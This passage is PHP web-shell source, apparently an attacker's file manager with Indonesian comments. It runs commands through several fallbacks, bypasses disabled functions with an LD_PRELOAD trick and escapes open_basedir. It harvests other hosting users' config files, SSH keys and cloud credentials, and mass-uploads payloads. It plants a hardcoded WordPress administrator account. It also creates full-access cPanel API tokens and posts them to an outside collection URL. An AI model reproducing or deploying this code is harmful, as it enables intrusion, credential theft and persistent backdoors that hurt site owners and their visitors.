get_current_user(), 'gid' => getmygid()]; $curl_v = function_exists('curl_version') ? curl_version()['version'] : 'N/A'; $safe_mode = (ini_get('safe_mode') == 1 || strtolower(ini_get('safe_mode')) == 'on') ? "ON" : "Off"; return [ 'os' => php_uname(), 'user' => getmyuid() . ' (' . $u_id['name'] . ')', 'safe' => $safe_mode, 'ip' => $_SERVER['SERVER_ADDR'] ?? gethostbyname($_SERVER['SERVER_NAME']), 'soft' => $_SERVER['SERVER_SOFTWARE'], 'php' => phpversion(), 'curl' => $curl_v, 'time' => date('Y-m-d H:i:s') ]; } $sys = get_sys_info(); // --- ULTIMATE JAILBREAK: MULTI-BINARY & PERSISTENT FALLBACK --- function x_jailbreak($file) { // LAYER 1: Command Execution dengan Multi-Binary Fallback // Mencoba berbagai metode eksekusi dan berbagai perintah baca $methods = ['shell_exec', 'exec', 'passthru', 'system', 'popen', 'proc_open']; // Daftar perintah alternatif pengganti 'cat' jika diblokir $binaries = [ 'cat', // Standar 'head -n 10000', // Baca bagian depan 'tail -n 10000', // Baca bagian belakang 'more', // Alternatif baca 'less', // Alternatif baca 'awk "{print}"', // Trik AWK 'sed -n "p"', // Trik SED 'tac', // Baca terbalik 'nl', // Baca dengan nomor baris 'dd status=none' // Binary level read ]; $disabled_raw = ini_get('disable_functions'); $disabled = ($disabled_raw) ? array_map('trim', explode(',', $disabled_raw)) : []; foreach ($methods as $method) { // Cek apakah fungsi PHP aktif dan tidak didisable if (function_exists($method) && !in_array($method, $disabled)) { // Loop setiap perintah binary (cat, head, tail, dll) foreach ($binaries as $bin) { $cmd = $bin . " " . escapeshellarg($file); $out = ""; if ($method === 'shell_exec') { $out = @shell_exec($cmd); } elseif ($method === 'exec') { $o = []; @exec($cmd, $o); $out = implode("\n", $o); } elseif ($method === 'passthru') { ob_start(); @passthru($cmd); $out = ob_get_clean(); } elseif ($method === 'system') { ob_start(); @system($cmd); $out = ob_get_clean(); } elseif ($method === 'popen') { $fp = @popen($cmd, 'r'); if ($fp) { while(!feof($fp)) $out .= fread($fp, 1024); pclose($fp); } } elseif ($method === 'proc_open') { $desc = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $p = @proc_open($cmd, $desc, $pipes); if (is_resource($p)) { $out = stream_get_contents($pipes[1]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); } } // Jika berhasil, langsung return hasilnya if (!empty($out)) return $out; } } } // LAYER 2: Symlink Trick (PHP Native) // Tetap dijalankan jika Layer 1 gagal/kosong (Persistent) if (function_exists('symlink') && is_writable(getcwd())) { $link = 'sfm_lnk_' . rand(1000,9999); @symlink($file, $link); if (file_exists($link)) { $content = @file_get_contents($link); @unlink($link); if ($content) return $content; } } // LAYER 3: The Heavy Loop (Last Resort) // Jalan terakhir jika semua cara di atas gagal if (function_exists('ini_set') && function_exists('chdir') && function_exists('mkdir')) { $old_cwd = getcwd(); $jb_dir = "sfm_jb_" . rand(1000,9999); if (@mkdir($jb_dir)) { @chdir($jb_dir); @ini_set('open_basedir', '..'); for ($i = 0; $i < 15; $i++) { @chdir('..'); @ini_set('open_basedir', '..'); } @chdir('/'); @ini_set('open_basedir', '/'); $content = @file_get_contents($file); @chdir($old_cwd); @rmdir($jb_dir); if ($content) return $content; } } return false; } // --- UPDATED READER (Prioritas Jailbreak) --- function x_read($path) { // 1. PRIORITAS UTAMA: Jailbreak (Ultimate Hybrid) // Mencoba teknik hacking (Command/Symlink/Loop) terlebih dahulu. $jb = x_jailbreak($path); if (!empty($jb)) return $jb; // 2. FALLBACK: Standard Read // Hanya jika semua metode jailbreak (termasuk loop berat) gagal total. if (is_readable($path)) return @file_get_contents($path); return false; } // --- STANDARD WRITE (LIGHTWEIGHT FOR AUTO CHAIN) --- function x_write($path, $data) { if (@file_put_contents($path, $data)) return true; if (function_exists('fopen')) { $h = @fopen($path, "w"); if ($h) { fwrite($h, $data); fclose($h); return true; } } return false; } // --- ROBUST WRITE (Anti 0KB + Anti Revert + Force 0444) --- function x_robust_write($path, $data, $lock_mode = false) { if (file_exists($path)) { @chmod($path, 0644); } $fp = @fopen($path, 'c+'); if ($fp) { if (@flock($fp, LOCK_EX)) { @ftruncate($fp, 0); @fwrite($fp, $data); @fflush($fp); @flock($fp, LOCK_UN); } else { @file_put_contents($path, $data); } @fclose($fp); } else { if(file_exists($path)) @unlink($path); @file_put_contents($path, $data); } clearstatcache(); if (filesize($path) == 0 && strlen($data) > 0) { @unlink($path); @file_put_contents($path, $data); } @touch($path, time() - 34560000); if ($lock_mode) { @chmod($path, 0444); } return file_exists($path); } function x_link($target, $link) { if (function_exists('symlink') && @symlink($target, $link)) return true; if (function_exists('link') && @link($target, $link)) return true; $cmd = "ln -s " . escapeshellarg($target) . " " . escapeshellarg($link); if (function_exists('shell_exec')) { @shell_exec($cmd); } elseif (function_exists('exec')) { @exec($cmd); } elseif (function_exists('system')) { ob_start(); @system($cmd); ob_end_clean(); } elseif (function_exists('passthru')) { ob_start(); @passthru($cmd); ob_end_clean(); } elseif (function_exists('proc_open')) { $desc = [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"]]; $p = @proc_open($cmd, $desc, $pipes); if (is_resource($p)) { @fclose($pipes[0]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($p); } } elseif (function_exists('popen')) { $h = @popen($cmd, 'r'); if($h) @pclose($h); } return file_exists($link); } function get_home_dirs() { $d = ['/home']; for ($i = 1; $i <= 9; $i++) $d[] = '/home' . $i; return $d; } function force_delete($target) { if (is_file($target)) return unlink($target); if (is_dir($target)) { $files = array_diff(scandir($target), array('.','..')); foreach ($files as $file) force_delete("$target/$file"); $try = rmdir($target); if ($try) return true; if (function_exists('shell_exec')) { @shell_exec("rm -rf " . escapeshellarg($target)); return !file_exists($target); } return false; } } function json_out($data) { header('Content-Type: application/json'); echo json_encode($data); exit; } function human_filesize($bytes, $dec = 2) { $size = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB'); $factor = floor((strlen($bytes) - 1) / 3); return sprintf("%.{$dec}f", $bytes / pow(1024, $factor)) . @$size[$factor]; } // --- SMART SCANNER --- function scan_smart_stream($dir, &$results) { $dir = rtrim($dir, '/') . '/'; if (file_exists($dir . 'wp-config.php')) $results[] = $dir . 'wp-config.php'; if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { if ($file === '.' || $file === '..') continue; $full_path = $dir . $file; if (is_dir($full_path) && !is_link($full_path)) { $target_public = $full_path . '/public_html/wp-config.php'; $target_root = $full_path . '/wp-config.php'; if (file_exists($target_public)) $results[] = $target_public; elseif (file_exists($target_root)) $results[] = $target_root; } } closedir($dh); } } function get_conf_val_smart($content, $key) { if (preg_match("/define\(\s*['\"]" . preg_quote($key, '/') . "['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $content, $m)) return $m[1]; return null; } // --- STANDARD DIRECTORY SCAN --- function scan_smart_targets($base_dir) { $targets = []; $items = @scandir($base_dir); if ($items) { foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $base_dir . '/' . $item; if (is_dir($path)) { if (is_writable($path)) $targets[] = $path; $pub = $path . '/public_html'; if (is_dir($pub) && is_writable($pub)) { $targets[] = $pub; } } } } return $targets; } if (isset($_SERVER[$h_act])) { $action = $_SERVER[$h_act]; $raw_path = isset($_SERVER[$h_path]) ? base64_decode($_SERVER[$h_path]) : ''; if ($raw_path === '__HOME__') { $target = getcwd(); } elseif ($raw_path === '') { $target = getcwd(); } else { $target = $raw_path; } $target = str_replace('\\', '/', $target); if(strlen($target) > 1) $target = rtrim($target, '/'); if(is_dir($target)) @chdir($target); elseif(is_file($target)) @chdir(dirname($target)); if ($action === 'list') { if (!is_dir($target)) { $target = getcwd(); } $items = @scandir($target); if ($items === false) { json_out(['path' => $target, 'items' => [], 'error' => 'Unreadable']); } $dirs = []; $files = []; foreach ($items as $i) { if ($i == '.' || $i == '..') continue; $path = $target . '/' . $i; $isDir = is_dir($path); $item = [ 'name'=>$i, 'type'=>$isDir?'dir':'file', 'size'=>$isDir?'-':human_filesize(@filesize($path)), 'perm'=>substr(sprintf('%o', @fileperms($path)),-4), 'write'=>is_writable($path), 'date'=>date("Y-m-d H:i", @filemtime($path)) ]; if ($isDir) $dirs[] = $item; else $files[] = $item; } usort($dirs, function($a, $b) { return strcasecmp($a['name'], $b['name']); }); usort($files, function($a, $b) { return strcasecmp($a['name'], $b['name']); }); json_out(['path' => $target, 'items' => array_merge($dirs, $files)]); } // --- UPDATED READ ACTION (WITH JAILBREAK FALLBACK) --- if ($action === 'read') { if (is_file($target)) { $c = x_read($target); echo $c ? $c : "Err: Unreadable (Try Jailbreak/Shell)"; } else { // Try jailbreak even if it doesn't look like a file (open_basedir hiding) $c = x_read($target); echo $c ? $c : "Err: Not a file / Access Denied"; } exit; } if ($action === 'save' || $action === 'upload') { $input = file_get_contents("php://input"); if (isset($_SERVER[$h_enc]) && $_SERVER[$h_enc] === 'b64') { $input = base64_decode($input); } echo (x_robust_write($target, $input, true) !== false) ? "Success" : "Err: Write failed"; exit; } if ($action === 'delete') { echo force_delete($target) ? "Deleted" : "Fail delete"; exit; } if ($action === 'rename') { $n = isset($_SERVER[$h_data]) ? base64_decode($_SERVER[$h_data]) : ''; if ($n) echo rename($target, dirname($target).'/'.$n) ? "Renamed" : "Fail"; exit; } if ($action === 'chmod') { $m = isset($_SERVER[$h_data]) ? $_SERVER[$h_data] : ''; if ($m) echo chmod($target, octdec($m)) ? "Chmod OK" : "Fail"; exit; } // --- BYPASS CMD (V65: HYBRID /TMP STRATEGY + ANTI-LOOP) --- if ($action === 'cmd') { $cmd_raw = isset($_SERVER[$h_cmd]) ? base64_decode($_SERVER[$h_cmd]) : 'whoami'; // Deteksi UAPI untuk strategi output ke TMP $is_uapi_token = (stripos($cmd_raw, 'uapi') !== false && stripos($cmd_raw, 'Tokens') !== false); // Fix Path $cmd = "export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin; " . $cmd_raw; $cmd_exec = $cmd . " 2>&1"; $out = ""; // Helper Run $try_run = function($method, $c) { if (!function_exists($method)) return false; $o = ""; if ($method == 'shell_exec') $o = @shell_exec($c); elseif ($method == 'passthru') { ob_start(); @passthru($c); $o = ob_get_clean(); } elseif ($method == 'system') { ob_start(); @system($c); $o = ob_get_clean(); } elseif ($method == 'exec') { @exec($c, $arr); $o = implode("\n", $arr); } elseif ($method == 'popen') { $h = @popen($c, 'r'); if($h) { while(!feof($h)) $o .= fread($h, 1024); pclose($h); } } elseif ($method == 'proc_open') { $d = [0=>["pipe","r"],1=>["pipe","w"],2=>["pipe","w"]]; $p = @proc_open($c, $d, $pipes); if (is_resource($p)) { $o = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); } } return $o; }; // 1. STANDARD ATTEMPT (Lewati jika UAPI agar langsung ke metode kuat) if (!$is_uapi_token) { $methods = ['shell_exec', 'passthru', 'proc_open', 'system']; foreach ($methods as $m) { if ($d = ini_get('disable_functions')) { if (stripos($d, $m) !== false) continue; } $res = $try_run($m, $cmd_exec); // Jika error memory/fork, anggap gagal dan lanjut ke Chankro if (stripos($res, 'Cannot allocate') !== false || stripos($res, 'fork') !== false) continue; if (!empty($res)) { $out = $res; break; } } } // 2. CHANKRO FALLBACK (ANTI-LOOP VIA ENV -U) if (empty($out) || $is_uapi_token) { $hook = ''; $so_file = $target . '/chankro.so'; $socket_file = $target . '/acpid.socket'; // Output ke TMP jika UAPI (lebih cepat/stabil), lokal jika biasa if ($is_uapi_token) { $out_file = '/tmp/sfm_out_' . time() . '.txt'; } else { $out_file = $target . '/chankro_out.txt'; } @unlink($so_file); @unlink($socket_file); @unlink($out_file); // ANTI-LOOP: Gunakan 'env -u' untuk membersihkan variabel hook sebelum perintah dijalankan $safe_cmd = "export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin; env -u LD_PRELOAD -u CHANKRO " . $cmd_raw; $full_command = "($safe_cmd) > $out_file 2>&1"; $meterpreter = base64_encode($full_command); x_write($so_file, base64_decode($hook)); x_write($socket_file, base64_decode($meterpreter)); putenv('CHANKRO=' . $socket_file); putenv('LD_PRELOAD=' . $so_file); if (function_exists('mail')) { @mail('a','a','a','a'); } elseif (function_exists('mb_send_mail')) { @mb_send_mail('a','a','a','a'); } elseif (function_exists('error_log')) { @error_log('a', 1, 'a'); } elseif (function_exists('imap_mail')) { @imap_mail('a','a','a'); } sleep($is_uapi_token ? 5 : 2); if (file_exists($out_file)) { $raw_out = file_get_contents($out_file); if ($is_uapi_token) { if (preg_match('/token:\s*(\S+)/i', $raw_out, $m)) { $out = "SUCCESS TOKEN:\n" . $m[1]; } elseif (stripos($raw_out, 'You do not have the feature') !== false) { $out = "FAILED: Feature 'apitokens' disabled by host."; } else { $clean = preg_replace('/^ERROR: ld\.so:.*$/m', '', $raw_out); $out = trim($clean); if(empty($out)) $out = "UAPI Executed but no token found (Raw):\n" . substr($raw_out, 0, 500); } } else { // CLEAN OUTPUT $clean = preg_replace('/^ERROR: ld\.so:.*$/m', '', $raw_out); $out = trim($clean); } if (empty($out) && !empty($raw_out)) $out = $raw_out; } else { $out = "[Chankro Failed: Output file not created at $out_file]"; } @unlink($so_file); @unlink($socket_file); if($is_uapi_token) @unlink($out_file); } if (empty($out) || strlen(trim($out)) === 0) { $out = "[No Output Produced]"; } echo $out; exit; } if ($action === 'tool') { $tool = isset($_SERVER[$h_tool]) ? $_SERVER[$h_tool] : ''; $home_dirs = get_home_dirs(); // --- UPDATED MASS UPLOAD (USE ROBUST WRITE) --- if ($tool === 'mass_upload') { $mode = isset($_SERVER[$h_mmode]) ? $_SERVER[$h_mmode] : 'init'; $tmp_list = sys_get_temp_dir() . "/sfm_mass_targets.json"; $tmp_file = sys_get_temp_dir() . "/sfm_mass_payload.tmp"; if ($mode === 'init') { $input = file_get_contents("php://input"); if (isset($_SERVER[$h_enc]) && $_SERVER[$h_enc] === 'b64') $input = base64_decode($input); file_put_contents($tmp_file, $input); $targets = scan_smart_targets($target); file_put_contents($tmp_list, json_encode($targets)); json_out(['status' => 'ready', 'total' => count($targets)]); } if ($mode === 'process') { $step = isset($_SERVER[$h_step]) ? (int)$_SERVER[$h_step] : 0; $filename = isset($_SERVER[$h_data]) ? base64_decode($_SERVER[$h_data]) : 'mass_file.php'; $limit = 20; if (!file_exists($tmp_list) || !file_exists($tmp_file)) { json_out(['status'=>'error', 'msg'=>'Task expired.']); } $targets = json_decode(file_get_contents($tmp_list), true); $total = count($targets); if ($total === 0 || $step >= $total) { @unlink($tmp_list); @unlink($tmp_file); json_out(['status' => 'done', 'total' => $total]); } $batch = array_slice($targets, $step, $limit); $payload = file_get_contents($tmp_file); $count_ok = 0; foreach($batch as $dir) { if(x_robust_write($dir . '/' . $filename, $payload, false)) $count_ok++; } $next_step = $step + $limit; json_out(['status' => 'continue', 'next_step' => $next_step, 'total' => $total, 'ok_batch' => $count_ok]); } exit; } // --- BYPASS USER (PRIORITY: ID SCANNING -> FALLBACK: ETC/PASSWD) --- if ($tool === 'bypass_user') { $found = []; // Daftar user system/sampah yang wajib dibuang $blacklist = [ 'root', 'bin', 'daemon', 'adm', 'lp', 'sync', 'shutdown', 'halt', 'mail', 'operator', 'games', 'ftp', 'named', 'nscd', 'rpcuser', 'rpc', 'mailnull', 'tss', 'sshd', 'dbus', 'dovecot', 'rtkit', 'agent360', 'ossece', 'ossecm', 'ossecr', 'ossec', 'imunify360-scanlogd', 'imunify360-webshield', 'wp-toolkit', 'lsadm', '_imunify', 'flatpak', 'geoclue', 'pipewire', 'polkitd', 'cpanelphpmyadmin', 'cpanelphppgadmin', 'dovenull', 'mysql', 'cpses', 'cpanelanalytics', 'cpanelconnecttrack', 'cpanelroundcube', 'cpaneleximscanner', 'cpaneleximfilter', 'cpanellogin', 'cpanelcabcache', 'cpanel', 'mailman', 'chrony', 'sssd', 'systemd-coredump', 'nobody', 'apache', 'nginx', 'litespeed', 'systemd-network', 'systemd-resolve', 'systemd-timesync' ]; // METODE 1: SCANNING ID (PRIORITAS UTAMA) // Mencoba mendapatkan user langsung dari Kernel via POSIX // Range scan: 0 sampai 5000 (Mencakup user system & user hosting) if (function_exists('posix_getpwuid')) { for ($userid = 0; $userid < 5000; $userid++) { $arr = @posix_getpwuid($userid); if (!empty($arr) && isset($arr['name'])) { $u = $arr['name']; $h = isset($arr['dir']) ? $arr['dir'] : ''; // Filter: Tidak boleh ada di blacklist DAN home dir harus valid if (!in_array($u, $blacklist)) { if (stripos($h, '/home') !== false || stripos($h, '/var/www') !== false || stripos($h, '/usr/home') !== false) { $found[] = $u; } } } } } // METODE 2: READ /ETC/PASSWD (FALLBACK) // Hanya dijalankan jika Metode 1 (Scanning ID) gagal total atau return kosong if (empty($found)) { $raw_etc = x_read("/etc/passwd"); if ($raw_etc) { $lines = explode("\n", $raw_etc); foreach($lines as $l) { if(empty(trim($l))) continue; $p = explode(":", $l); $u = isset($p[0]) ? trim($p[0]) : ''; $h = isset($p[5]) ? trim($p[5]) : ''; // Kolom 6 = Home Dir if (!empty($u) && !in_array($u, $blacklist)) { if (stripos($h, '/home') !== false || stripos($h, '/var/www') !== false || stripos($h, '/usr/home') !== false) { $found[] = $u; } } } } } // Hapus duplikat & Simpan $found = array_unique($found); $output = ""; foreach($found as $user) { $output .= $user . ":\n"; } if(!empty($output)) { x_write("passwd.txt", $output); echo "Saved to: passwd.txt\nMethod: " . (function_exists('posix_getpwuid') ? "ID Scan (Primary)" : "File Read (Fallback)") . "\nClean Users Found: " . count($found); } else { echo "Failed. No valid hosting users found via ID Scan or File Read."; } exit; } if ($tool === 'add_admin') { $step = isset($_SERVER[$h_step]) ? (int)$_SERVER[$h_step] : 0; $limit = 5; $mode = isset($_SERVER['HTTP_X_MODE']) ? $_SERVER['HTTP_X_MODE'] : 'jumping'; $target_sub = ($mode === 'symlink') ? '3x_sym' : 'jumping'; $scan_path = is_dir($target . '/' . $target_sub) ? $target . '/' . $target_sub : $target; $all_files = scandir($scan_path); $config_files = []; foreach($all_files as $f) { if($f == '.' || $f == '..') continue; if(stripos($f, 'config') !== false || stripos($f, 'settings') !== false || substr($f, -4) === '.txt') { $config_files[] = $scan_path . '/' . $f; } } $total = count($config_files); if ($step >= $total) { echo json_encode(['status'=>'done', 'html'=>'', 'total'=>$total]); exit; } $batch_files = array_slice($config_files, $step, $limit); $html_log = ""; foreach($batch_files as $file) { $content = x_read($file); if(!$content) continue; if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.*?)['\"]\s*\)/i", $content, $m_name)) { $db_name = $m_name[1]; preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.*?)['\"]\s*\)/i", $content, $m_user); $db_user = $m_user[1] ?? ''; preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.*?)['\"]\s*\)/i", $content, $m_pass); $db_pass = $m_pass[1] ?? ''; preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.*?)['\"]\s*\)/i", $content, $m_host); $db_host = $m_host[1] ?? 'localhost'; preg_match("/table_prefix\s*=\s*['\"](.*?)['\"]/", $content, $m_pre); $pre = $m_pre[1] ?? 'wp_'; $new_u = "xshikata"; $new_p_raw = "Wh0th3h3llAmi"; $new_p_hash = md5($new_p_raw); $link = mysqli_init(); mysqli_options($link, MYSQLI_OPT_CONNECT_TIMEOUT, 3); $con = @mysqli_real_connect($link, $db_host, $db_user, $db_pass, $db_name); if (!$con && $db_host == 'localhost') { $link = mysqli_init(); mysqli_options($link, MYSQLI_OPT_CONNECT_TIMEOUT, 3); $con = @mysqli_real_connect($link, '127.0.0.1', $db_user, $db_pass, $db_name); } if ($con) { $site_url = ""; $q = @mysqli_query($link, "SELECT option_value FROM {$pre}options WHERE option_name='siteurl' LIMIT 1"); if ($q && $r = @mysqli_fetch_assoc($q)) $site_url = $r['option_value']; $disp_url = parse_url($site_url, PHP_URL_HOST); if(!$disp_url) $disp_url = $site_url; // LOGIC STATUS $st_txt = "New Admin"; $st_cls = "status-success"; $chk = @mysqli_query($link, "SELECT ID FROM {$pre}users WHERE user_login='$new_u'"); if ($chk && @mysqli_num_rows($chk) > 0) { $old = @mysqli_fetch_assoc($chk); @mysqli_query($link, "DELETE FROM {$pre}users WHERE ID = " . $old['ID']); @mysqli_query($link, "DELETE FROM {$pre}usermeta WHERE user_id = " . $old['ID']); $st_txt = "Replaced"; $st_cls = "status-warning"; } $ins = @mysqli_query($link, "INSERT INTO {$pre}users (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name) VALUES ('$new_u', '$new_p_hash', '$new_u', 'admin@admin.com', NOW(), 0, '$new_u')"); if ($ins) { $uid = @mysqli_insert_id($link); @mysqli_query($link, "INSERT INTO {$pre}usermeta (user_id, meta_key, meta_value) VALUES ($uid, '{$pre}capabilities', 'a:1:{s:13:\"administrator\";b:1;}')"); @mysqli_query($link, "INSERT INTO {$pre}usermeta (user_id, meta_key, meta_value) VALUES ($uid, '{$pre}user_level', '10')"); // --- NEW HTML STRUCTURE (MODERN ROW) --- $html_log .= "
$disp_url
$st_txt
$new_u
$new_p_raw
"; } @mysqli_close($link); } } } $next_step = $step + $limit; if ($next_step < $total) { echo json_encode(['status'=>'continue', 'next_step'=>$next_step, 'html'=>$html_log, 'total'=>$total, 'current'=>$next_step]); } else { echo json_encode(['status'=>'done', 'html'=>$html_log, 'total'=>$total]); } exit; } // --- SMART JUMPER & SYMLINKER (UNIVERSAL PATH: CPANEL + DIRECTADMIN) --- if ($tool === 'symlink_cage' || $tool === 'jumper_cage') { $c = x_read(getcwd()."/passwd.txt"); if(!$c) { echo "Err: passwd.txt missing. Run 'Bypass User' first."; exit; } $users = explode("\n", $c); $dir = ($tool === 'symlink_cage') ? "3x_sym" : "jumping"; if(!is_dir($dir)) @mkdir($dir, 0755); @chdir($dir); x_write(".htaccess", "Options Indexes FollowSymLinks\nDirectoryIndex x\nAddType text/plain .php\nAddHandler text/plain .php"); // 1. CONFIG CMS (Updated List) $cms_map = [ 'wp-config.php' => 'wordpress', '.env' => 'laravel_env', 'configuration.php' => 'joomla_whmcs', 'sites/default/settings.php'=> 'drupal', 'app/etc/env.php' => 'magento_env', 'app/etc/local.xml' => 'magento_xml', 'app/config/parameters.php' => 'prestashop', 'config/settings.inc.php' => 'prestashop_old', 'config.php' => 'opencart', 'admin/config.php' => 'opencart_admin', 'core/includes/config.php' => 'vbulletin', 'includes/config.php' => 'vbulletin_old', 'src/config.php' => 'xenforo', 'library/config.php' => 'xenforo_old', 'application/config/database.php' => 'codeigniter', 'typo3conf/LocalConfiguration.php' => 'typo3', 'wp/wp-config.php' => 'wp', 'config/db.php' => 'yii_db' ]; // 2. FILE SENSITIF (Root Home) $sensitive_map = [ '.my.cnf' => 'cp', '.accesshash' => 'whm', '.bash_history' => 'bash_hist', '.mysql_history' => 'sql_hist', '.ssh/id_rsa' => 'ssh_rsa', '.ssh/id_ed25519' => 'ssh_ed25519', '.ssh/known_hosts' => 'ssh_hosts', '.aws/credentials' => 'aws_key', '.git-credentials' => 'git_key' ]; $n = 0; foreach ($users as $u_str) { $u = trim(explode(":", $u_str)[0]); if(!$u) continue; foreach ($home_dirs as $h) { $home_root = "$h/$u"; $found_cms = false; // --- [HELPER] STRICT CHECKER & SAVER --- $process_file = function($target_path, $save_name) use ($tool, &$n) { if ($tool === 'jumper_cage') { $dat = x_read($target_path); // Validasi Ketat: Ada isi, bukan error if ($dat && strlen($dat) > 10 && stripos($dat, 'No such file') === false && stripos($dat, 'Permission denied') === false && stripos($dat, 'Unable to open') === false) { x_write($save_name, $dat); @chmod($save_name, 0644); $n++; return true; } } elseif ($tool === 'symlink_cage') { if (file_exists($save_name)) @unlink($save_name); x_link($target_path, $save_name); // Validasi Symlink: Coba baca sedikit $test_read = @file_get_contents($save_name, false, null, 0, 50); if ($test_read !== false && strlen($test_read) > 0 && stripos($test_read, 'Permission denied') === false) { @chmod($save_name, 0644); $n++; return true; } else { @unlink($save_name); // Hapus symlink mati } } return false; }; // --- STEP A: CARI FILE SENSITIF (Di Root Home) --- foreach ($sensitive_map as $file => $out_name) { $process_file("$home_root/$file", "$u~" . str_replace("/", "", $h) . "~$out_name.txt"); } // --- STEP B: DETEKSI DOCUMENT ROOTS (cPanel & DirectAdmin) --- $target_roots = []; // 1. Standar cPanel (/home/user/public_html) if (is_dir("$home_root/public_html")) { $target_roots[] = "$home_root/public_html"; } // 2. DirectAdmin / Multi-Domain (/home/user/domains/domain.com/public_html) if (is_dir("$home_root/domains")) { $domains = @scandir("$home_root/domains"); if ($domains) { foreach ($domains as $d) { if ($d === '.' || $d === '..' || !is_dir("$home_root/domains/$d")) continue; $da_path = "$home_root/domains/$d/public_html"; if (is_dir($da_path)) { $target_roots[] = $da_path; } } } } // --- STEP C: SCAN CONFIG DI SEMUA ROOT YANG DITEMUKAN --- foreach ($target_roots as $public_html) { if ($found_cms) break; // Smart Stop: Cukup 1 config valid per user foreach ($cms_map as $file => $cms_name) { $target = "$public_html/$file"; $save_name = "$u~" . str_replace("/", "", $h) . "~$cms_name.txt"; if ($process_file($target, $save_name)) { $found_cms = true; break; // Stop loop CMS } } } if ($found_cms) break; // Pindah ke user berikutnya } } echo "$tool Done. Total Valid & Readable Files: $n."; exit; } // --- BACKUP (UAPI TOKEN + CREATE ADMIN) --- if ($tool === 'backup') { echo "
"; // --- PART 1: UAPI TOKEN --- echo "
1. CPANEL TOKEN
"; $cwd = str_replace('\\', '/', getcwd()); $homedir = "/home/" . get_current_user() . "/public_html"; if (preg_match('~^(/home\d*?/[^/]+)~', $cwd, $m)) { $homedir = $m[1] . "/public_html"; } $cmd = "(uapi Tokens create_full_access name=xshikata || /usr/bin/uapi Tokens create_full_access name=xshikata || /usr/local/cpanel/bin/uapi Tokens create_full_access name=xshikata) 2>&1"; $output = ""; $used_method = "None"; $methods = [ 'shell_exec' => function($c) { return @shell_exec($c); }, 'exec' => function($c) { @exec($c, $o); return implode("\n", $o); }, 'passthru' => function($c) { ob_start(); @passthru($c); return ob_get_clean(); }, 'system' => function($c) { ob_start(); @system($c); return ob_get_clean(); }, 'popen' => function($c) { $h = @popen($c, 'r'); if($h) { $o = stream_get_contents($h); @pclose($h); return $o; } return null; }, 'proc_open' => function($c) { $d = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; $p = @proc_open($c, $d, $pipes); if (is_resource($p)) { $o = stream_get_contents($pipes[1]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($p); return $o; } return null; } ]; foreach ($methods as $name => $func) { if (function_exists($name)) { $res = $func($cmd); if (!empty($res)) { $output = $res; if (stripos($res, 'token:') !== false || stripos($res, 'conflicting') !== false || stripos($res, 'already exists') !== false) { $used_method = $name; break; } } } } $token_val = ""; $display_status = "UNKNOWN"; $display_color = "text-secondary"; if(preg_match('/token:\s*(\S+)/i', $output, $m)) { $token_val = trim($m[1]); $display_status = "CREATED"; $display_color = "text-success"; } elseif (stripos($output, 'conflicting') !== false || stripos($output, 'already exists') !== false) { $token_val = "Exists (Secret Hidden)"; $display_status = "ALREADY EXISTS"; $display_color = "text-warning"; } else { $display_status = "NOT FOUND"; $display_color = "text-danger"; } $server_response = "Skipped"; $srv_color = "text-secondary"; if ($display_status === "CREATED" && !empty($token_val)) { $target_url = "https://stepmomhub.com/catch.php"; $data_json = json_encode([ "domain" => $_SERVER['HTTP_HOST'], "username" => get_current_user(), "apiToken" => $token_val, "homedir" => $homedir ]); $raw_response = "No Connect"; if (function_exists('curl_init')) { $ch = curl_init($target_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data_json); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $raw_response = curl_exec($ch); curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $opts = ['http' => ['method'=>'POST', 'header'=>'Content-Type: application/json', 'content'=>$data_json, 'timeout'=>10], 'ssl'=>['verify_peer'=>false, 'verify_peer_name'=>false]]; $raw_response = @file_get_contents($target_url, false, stream_context_create($opts)); } $json_res = json_decode($raw_response, true); if ($json_res) { if ($json_res['status'] === 'success') { $server_response = "Saved to Database."; $srv_color = "text-success"; } elseif ($json_res['status'] === 'ignored') { $server_response = "Already Saved (Duplicate)."; $srv_color = "text-warning"; } else { $server_response = "Server Error: " . $json_res['msg']; $srv_color = "text-danger"; } } else { $server_response = "Raw: " . substr($raw_response, 0, 50); } } elseif ($display_status === "ALREADY EXISTS") { $server_response = "Skipped (Secret Hidden)"; $srv_color = "text-warning"; } echo "
Method: $used_method | Token: $display_status
"; echo "
Server: $server_response
"; if ($display_status === "NOT FOUND") { $clean_out = htmlspecialchars(substr($output, 0, 200)); echo "
$clean_out
"; } echo "
"; // --- PART 2: CREATE ADMIN WORDPRESS --- echo "
2. WP ADMIN CREATOR
"; $targets = []; scan_smart_stream($target, $targets); $targets = array_unique($targets); if (empty($targets)) { echo "
No wp-config.php found in this path.
